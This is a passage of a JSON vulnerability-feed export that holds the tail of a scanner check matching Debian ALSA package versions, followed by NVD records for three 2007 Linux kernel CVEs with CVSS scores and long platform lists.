isdpkgvuln(pkg:\"alsa-modules-2.4.27-4-386\", ver:\"1.0.8+2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-modules-2.4.27-4-686\", ver:\"1.0.8+2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-modules-2.4-386\", ver:\"1.0.8+2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-modules-2.4.27-4-k7-smp\", ver:\"1.0.8+2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-modules-2.4-k7-smp\", ver:\"1.0.8+2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-modules-2.4.27-4-686-smp\", ver:\"1.0.8+2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-modules-2.4-686-smp\", ver:\"1.0.8+2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-modules-2.4-686\", ver:\"1.0.8+2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-modules-2.4.27-4-k6\", ver:\"1.0.8+2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-modules-2.4-k7\", ver:\"1.0.8+2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-modules-2.4.27-4-k7\", ver:\"1.0.8+2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-modules-2.4.27-4-586tsc\", ver:\"1.0.8+2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-modules-2.4-586tsc\", ver:\"1.0.8+2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-modules-2.4-k6\", ver:\"1.0.8+2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-source\", ver:\"1.0.13-5etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-base\", ver:\"1.0.13-5etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-sound-base\", ver:\"1.0.13-5etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cve": [{"lastseen": "2020-12-09T19:26:07", "description": "The IA32 system call emulation functionality in Linux kernel 2.4.x and 2.6.x before 2.6.22.7, when running on the x86_64 architecture, does not zero extend the eax register after the 32bit entry path to ptrace is used, which might allow local users to gain privileges by triggering an out-of-bounds access to the system call table using the %RAX register.", "edition": 5, "cvss3": {}, "published": "2007-09-24T22:17:00", "title": "CVE-2007-4573", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4573"], "modified": "2018-10-15T21:36:00", "cpe": ["cpe:/o:linux:linux_kernel:2.4.35", "cpe:/o:linux:linux_kernel:2.6.22.6"], "id": "CVE-2007-4573", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4573", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.4.35:*:x86_64:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.6:*:x86_64:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:26:07", "description": "The snd_mem_proc_read function in sound/core/memalloc.c in the Advanced Linux Sound Architecture (ALSA) in the Linux kernel before 2.6.22.8 does not return the correct write size, which allows local users to obtain sensitive information (kernel memory contents) via a small count argument, as demonstrated by multiple reads of /proc/driver/snd-page-alloc.", "edition": 5, "cvss3": {}, "published": "2007-09-26T10:17:00", "title": "CVE-2007-4571", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4571"], "modified": "2017-09-29T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.22.7"], "id": "CVE-2007-4571", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4571", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.22.7:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:45:51", "description": "The sctp_new function in (1) ip_conntrack_proto_sctp.c and (2) nf_conntrack_proto_sctp.c in Netfilter in Linux kernel 2.6 before 2.6.20.13, and 2.6.21.x before 2.6.21.4, allows remote attackers to cause a denial of service by causing certain invalid states that trigger a NULL pointer dereference.", "edition": 3, "cvss3": {}, "published": "2007-06-11T23:30:00", "title": "CVE-2007-2876", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.1, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-2876"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.20.9", "cpe:/o:linux:linux_kernel:2.6.12.22", "cpe:/o:linux:linux_kernel:2.6.18.1", "cpe:/o:linux:linux_kernel:2.6.19.1", "cpe:/o:linux:linux_kernel:2.6.16.4", "cpe:/o:linux:linux_kernel:2.6.16.15", "cpe:/o:linux:linux_kernel:2.6.15.2", "cpe:/o:linux:linux_kernel:2.6.16.3", "cpe:/o:linux:linux_kernel:2.6.21", "cpe:/o:linux:linux_kernel:2.6.14.4", "cpe:/o:linux:linux_kernel:2.6.16.20", "cpe:/o:linux:linux_kernel:2.6.4", "cpe:/o:linux:linux_kernel:2.6.16.9", "cpe:/o:linux:linux_kernel:2.6.16.10", "cpe:/o:linux:linux_kernel:2.6.11.7", "cpe:/o:linux:linux_kernel:2.6.11.8", "cpe:/o:linux:linux_kernel:2.6.12.3", "cpe:/o:linux:linux_kernel:2.6.16_rc7", "cpe:/o:linux:linux_kernel:2.6.14.1", "cpe:/o:linux:linux_kernel:2.6.14.7", "cpe:/o:linux:linux_kernel:2.6.16.40", "cpe:/o:linux:linux_kernel:2.6.16.22", "cpe:/o:linux:linux_kernel:2.6.16.5", "cpe:/o:linux:linux_kernel:2.6.12", "cpe:/o:linux:linux_kernel:2.6.8", "cpe:/o:linux:linux_kernel:2.6.21.1", "cpe:/o:linux:linux_kernel:2.6.1", "cpe:/o:linux:linux_kernel:2.6.16.18", "cpe:/o:linux:linux_kernel:2.6.15.7", "cpe:/o:linux:linux_kernel:2.6.17.11", "cpe:/o:linux:linux_kernel:2.6.14", "cpe:/o:linux:linux_kernel:2.6.16.29", "cpe:/o:linux:linux_kernel:2.6.16.27", "cpe:/o:linux:linux_kernel:2.6.11.2", "cpe:/o:linux:linux_kernel:2.6.17.2", "cpe:/o:linux:linux_kernel:2.6.11.11", "cpe:/o:linux:linux_kernel:2.6.16.21", "cpe:/o:linux:linux_kernel:2.6.19", "cpe:/o:linux:linux_kernel:2.6.12.5", "cpe:/o:linux:linux_kernel:2.6.17.1", "cpe:/o:linux:linux_kernel:2.6.16.30", "cpe:/o:linux:linux_kernel:2.6.13", "cpe:/o:linux:linux_kernel:2.6.11.9", "cpe:/o:linux:linux_kernel:2.6.14.5", "cpe:/o:linux:linux_kernel:2.6.20.11", "cpe:/o:linux:linux_kernel:2.6.15.6", "cpe:/o:linux:linux_kernel:2.6.19.2", "cpe:/o:linux:linux_kernel:2.6.17.10", "cpe:/o:linux:linux_kernel:2.6.16.19", "cpe:/o:linux:linux_kernel:2.6.15.1", "cpe:/o:linux:linux_kernel:2.6.20", "cpe:/o:linux:linux_kernel:2.6.16.34", "cpe:/o:linux:linux_kernel:2.6.16.14", "cpe:/o:linux:linux_kernel:2.6.18", "cpe:/o:linux:linux_kernel:2.6.20.8", "cpe:/o:linux:linux_kernel:2.6.3", "cpe:/o:linux:linux_kernel:2.6.14.2", "cpe:/o:linux:linux_kernel:2.6.11.10", "cpe:/o:linux:linux_kernel:2.6.16.12", "cpe:/o:linux:linux_kernel:2.6.20.14", "cpe:/o:linux:linux_kernel:2.6.17.13", "cpe:/o:linux:linux_kernel:2.6.6", "cpe:/o:linux:linux_kernel:2.6.20.12", "cpe:/o:linux:linux_kernel:2.6.12.1", "cpe:/o:linux:linux_kernel:2.6.16.39", "cpe:/o:linux:linux_kernel:2.6.20.3", "cpe:/o:linux:linux_kernel:2.6.16.8", "cpe:/o:linux:linux_kernel:2.6.16.25", "cpe:/o:linux:linux_kernel:2.6.18.5", "cpe:/o:linux:linux_kernel:2.6.16.17", "cpe:/o:linux:linux_kernel:2.6.5", "cpe:/o:linux:linux_kernel:2.6.16.26", "cpe:/o:linux:linux_kernel:2.6.16.32", "cpe:/o:linux:linux_kernel:2.6.14.3", "cpe:/o:linux:linux_kernel:2.6.8.1.5", "cpe:/o:linux:linux_kernel:2.6.16.1", "cpe:/o:linux:linux_kernel:2.6.17.3", "cpe:/o:linux:linux_kernel:2.6.16.33", "cpe:/o:linux:linux_kernel:2.6.19.3", "cpe:/o:linux:linux_kernel:2.6.18.3", "cpe:/o:linux:linux_kernel:2.6.18.6", "cpe:/o:linux:linux_kernel:2.6.0", "cpe:/o:linux:linux_kernel:2.6.2", "cpe:/o:linux:linux_kernel:2.6.13.2", "cpe:/o:linux:linux_kernel:2.6.16.36", "cpe:/o:linux:linux_kernel:2.6.16.37", "cpe:/o:linux:linux_kernel:2.6.13.5", "cpe:/o:linux:linux_kernel:2.6.17.9", "cpe:/o:linux:linux_kernel:2.6.18.2", "cpe:/o:linux:linux_kernel:2.6.20.6", "cpe:/o:linux:linux_kernel:2.6.9", "cpe:/o:linux:linux_kernel:2.6.20.2", "cpe:/o:linux:linux_kernel:2.6.10", "cpe:/o:linux:linux_kernel:2.6.17.8", "cpe:/o:linux:linux_kernel:2.6.11.12", "cpe:/o:linux:linux_kernel:2.6.11", "cpe:/o:linux:linux_kernel:2.6.15.5", "cpe:/o:linux:linux_kernel:2.6.15.3", "cpe:/o:linux:linux_kernel:2.6.17.14", "cpe:/o:linux:linux_kernel:2.6.16.7", "cpe:/o:linux:linux_kernel:2.6.15.4", "cpe:/o:linux:linux_kernel:2.6.20.5", "cpe:/o:linux:linux_kernel:2.6.11.6", "cpe:/o:linux:linux_kernel:2.6.16.38", "cpe:/o:linux:linux_kernel:2.6.17.12", "cpe:/o:linux:linux_kernel:2.6.16.16", "cpe:/o:linux:linux_kernel:2.6.16.2", "cpe:/o:linux:linux_kernel:2.6.20.7", "cpe:/o:linux:linux_kernel:2.6.17", "cpe:/o:linux:linux_kernel:2.6.16.31", "cpe:/o:linux:linux_kernel:2.6.20.4", "cpe:/o:linux:linux_kernel:2.6.13.4", "cpe:/o:linux:linux_kernel:2.6.11.4", "cpe:/o:linux:linux_kernel:2.6.12.4", "cpe:/o:linux:linux_kernel:2.6.7", "cpe:/o:linux:linux_kernel:2.6.16", "cpe:/o:linux:linux_kernel:2.6.11_rc1_bk6", "cpe:/o:linux:linux_kernel:2.6.16.41", "cpe:/o:linux:linux_kernel:2.6.15.11", "cpe:/o:linux:linux_kernel:2.6.15", "cpe:/o:linux:linux_kernel:2.6.17.7", "cpe:/o:linux:linux_kernel:2.6.11.1", "cpe:/o:linux:linux_kernel:2.6.16.28", "cpe:/o:linux:linux_kernel:2.6.18.4", "cpe:/o:linux:linux_kernel:2.6.21.3", "cpe:/o:linux:linux_kernel:2.6.8.1", "cpe:/o:linux:linux_kernel:2.6_test9_cvs", "cpe:/o:linux:linux_kernel:2.6.12.12", "cpe:/o:linux:linux_kernel:2.6.11.5", "cpe:/o:linux:linux_kernel:2.6.12.6", "cpe:/o:linux:linux_kernel:2.6.16.24", "cpe:/o:linux:linux_kernel:2.6.17.6", "cpe:/o:linux:linux_kernel:2.6.20.1", "cpe:/o:linux:linux_kernel:2.6.17.4", "cpe:/o:linux:linux_kernel:2.6.13.1", "cpe:/o:linux:linux_kernel:2.6.16.6", "cpe:/o:linux:linux_kernel:2.6.11.3", "cpe:/o:linux:linux_kernel:2.6.14.6", "cpe:/o:linux:linux_kernel:2.6.16.35", "cpe:/o:linux:linux_kernel:2.6.12.2", "cpe:/o:linux:linux_kernel:2.6.20.13", "cpe:/o:linux:linux_kernel:2.6.16.11", "cpe:/o:linux:linux_kernel:2.6.20.10", "cpe:/o:linux:linux_kernel:2.6.17.5", "cpe:/o:linux:linux_kernel:2.6.16.23", "cpe:/o:linux:linux_kernel:2.6.13.3", "cpe:/o:linux:linux_kernel:2.6.21.2", "cpe:/o:linux:linux_kernel:2.6.16.13"], "id": "CVE-2007-2876", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2876", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.16:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test11:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:git3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:git5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:git1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6_test9_cvs:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:git2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:git4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:git7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:git6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.8:*:*:*:*:*:*:*", 